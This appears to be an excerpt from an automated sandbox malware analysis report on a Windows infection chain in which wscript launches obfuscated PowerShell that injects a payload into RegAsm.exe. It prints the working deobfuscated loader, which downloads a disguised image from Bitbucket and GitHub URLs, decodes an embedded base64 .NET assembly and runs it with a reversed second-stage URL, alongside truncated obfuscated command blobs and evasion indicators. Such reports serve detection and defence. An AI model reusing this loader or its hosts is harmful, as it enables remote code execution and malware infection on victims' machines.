bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045245D push esi; ret 8_2_00452466
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A616 push ecx; ret 8_2_0044A629
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C766 push ecx; ret 8_2_0042C779
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044AE78 push eax; ret 8_2_0044AE96
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00404A3B ShellExecuteW,URLDownloadToFileW,8_2_00404A3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_00413168

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00414EED LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_00414EED
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040A6C0 Sleep,ExitProcess, 8_2_0040A6C0
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 8_2_00412E96
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
               Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1771
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1521
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3998
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5579
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 4159
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 5834
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_8-40995
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488 Thread sleep time: -922337203685477s >= -30000s
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180 Thread sleep count: 3998 > 30
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep count: 5579 > 30
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244 Thread sleep time: -13835058055282155s >= -30000s
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7500 Thread sleep time: -12477000s >= -30000s
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7500 Thread sleep time: -17502000s >= -30000s
               Source: C:\Windows\System32\svchost.exe TID: 7808 Thread sleep time: -30000s >= -30000s
               Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
               Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_004081F9
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_004072E5
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_00407733
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose, 8_2_00414795
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00440A59 FindFirstFileExA, 8_2_00440A59
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00404CF3 FindFirstFileW,FindNextFileW, 8_2_00404CF3
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_00405C8E
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_00407FDE
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_0040511A
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMU Virtual CPU
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
               Source: RegAsm.exe, 00000008.00000002.3511473466.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3507303491.0000011BA9E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3508805857.0000011BAF458000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
               Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
               Source: RegAsm.exe, 00000008.00000002.3511473466.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
               Source: powershell.exe, 00000006.00000002.2379283237.000001F504D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_004320EC
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow, 8_2_0040F4A7
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00438983 mov eax, dword ptr fs:[00000030h] 8_2_00438983
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040CB6C SetLastError,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError, 8_2_0040CB6C
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0042C576 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0042C576
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0042C6C4 SetUnhandledExceptionFilter, 8_2_0042C6C4
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0042C8EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_0042C8EC

              HIPS / PFW / Operating System Protection Evasion

               Source: Yara match File source: amsi64_1812.amsi.csv, type: OTHER
               Source: Yara match File source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTR
               Source: Yara match File source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46A000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A68008
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004124EF mouse_event, 8_2_004124EF
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#
bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c